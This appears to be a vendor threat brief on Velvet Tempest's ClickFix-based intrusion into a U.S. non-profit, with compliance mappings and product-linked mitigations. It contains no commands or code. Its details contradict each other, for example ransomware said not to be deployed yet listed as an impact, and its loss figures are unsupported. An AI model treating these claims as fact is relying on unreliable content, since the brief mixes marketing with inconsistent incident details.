Executive Summary
Between February 3 and 16, 2026, the threat group Velvet Tempest (also known as DEV-0504) conducted a sophisticated cyber intrusion targeting a U.S. non-profit organization with over 3,000 endpoints and 2,500 users. Utilizing a malvertising campaign, they employed the 'ClickFix' technique, deceiving victims into executing obfuscated commands via the Windows Run dialog. This led to the deployment of DonutLoader and the CastleRAT backdoor, facilitating credential harvesting and extensive reconnaissance. Notably, while Velvet Tempest is known for deploying various ransomware strains, including Ryuk, REvil, and Conti, the Termite ransomware was not executed in this particular incident. (bleepingcomputer.com)
This incident underscores the evolving tactics of ransomware affiliates, highlighting the use of social engineering techniques like 'ClickFix' to gain initial access. The absence of immediate ransomware deployment suggests a strategic shift towards prolonged network infiltration and data exfiltration, posing significant challenges for detection and mitigation.
Why This Matters Now
The Velvet Tempest intrusion highlights the increasing sophistication of ransomware affiliates employing deceptive techniques like 'ClickFix' to infiltrate networks. Organizations must enhance their defenses against such social engineering tactics to prevent potential data breaches and operational disruptions.
Attack Path Analysis
Velvet Tempest initiated the attack by employing a malvertising campaign that led victims to execute an obfuscated command, granting initial access. They then escalated privileges by harvesting credentials stored in Chrome using a PowerShell script. Subsequently, they moved laterally within the network, performing Active Directory reconnaissance and host discovery. For command and control, they deployed the CastleRAT backdoor to maintain persistent access. While data exfiltration was not explicitly observed, the deployment of CastleRAT suggests potential for such activity. Ultimately, the attack did not culminate in ransomware deployment, indicating a possible focus on establishing long-term access or data theft.
Kill Chain Progression
Initial Compromise
Description
Velvet Tempest gained initial access through a malvertising campaign that led victims to execute an obfuscated command via the Windows Run dialog.
MITRE ATT&CK® Techniques
Spearphishing Attachment
Malicious File
PowerShell
Valid Accounts
Domain Group
LSASS Memory
Dynamic-link Library Injection
Data Encrypted for Impact
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Malware Protection
Control ID: 6.2.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Identity and Access Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Non-Profit/Volunteering
Termite ransomware specifically targeted non-profit with 3,000+ endpoints using ClickFix social engineering, requiring enhanced egress security and zero trust segmentation controls.
Health Care / Life Sciences
Ransomware attacks on medical centers closing clinics demand HIPAA-compliant encrypted traffic, threat detection, and data exfiltration prevention to protect patient operations.
Information Technology/IT
Velvet Tempest's DonutLoader and CastleRAT deployment through legitimate Windows utilities necessitates advanced anomaly detection and kubernetes security for service providers.
Financial Services
Multi-stage malware campaigns bypassing traditional defenses require PCI-compliant multicloud visibility, inline IPS protection, and comprehensive east-west traffic security monitoring.
Sources
- Termite ransomware breaches linked to ClickFix CastleRAT attackshttps://www.bleepingcomputer.com/news/security/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/Verified
- Termite ransomware breaches linked to ClickFix CastleRAT attackshttps://www.hendryadrian.com/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the attacker's ability to move laterally and maintain persistent access, thereby reducing the overall blast radius.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The attacker's initial access may have been constrained, reducing the likelihood of successful exploitation.
Control: Zero Trust Segmentation
Mitigation: The attacker's ability to escalate privileges could have been limited, reducing the scope of unauthorized access.
Control: East-West Traffic Security
Mitigation: The attacker's lateral movement within the network could have been constrained, reducing the spread of the attack.
Control: Multicloud Visibility & Control
Mitigation: The establishment of persistent command and control channels could have been limited, reducing the attacker's ability to maintain access.
Control: Egress Security & Policy Enforcement
Mitigation: Potential data exfiltration activities could have been constrained, reducing the risk of data loss.
The overall impact of the attack could have been limited, reducing the potential for long-term access or data theft.
Impact at a Glance
Affected Business Functions
- IT Service Management
- User Support Services
- Data Security
- Network Operations
Estimated downtime: 14 days
Estimated loss: $500,000
Potential exposure of sensitive organizational data, including user credentials and internal communications.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict lateral movement and limit the attacker's ability to traverse the network.
- • Enhance Threat Detection & Anomaly Response capabilities to identify and respond to suspicious activities, such as unauthorized credential harvesting.
- • Deploy Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing potential data exfiltration.
- • Utilize Multicloud Visibility & Control to gain comprehensive insights into network activities across cloud environments, aiding in the detection of command and control communications.
- • Regularly update and enforce security policies to mitigate risks associated with malvertising and social engineering tactics used for initial compromise.
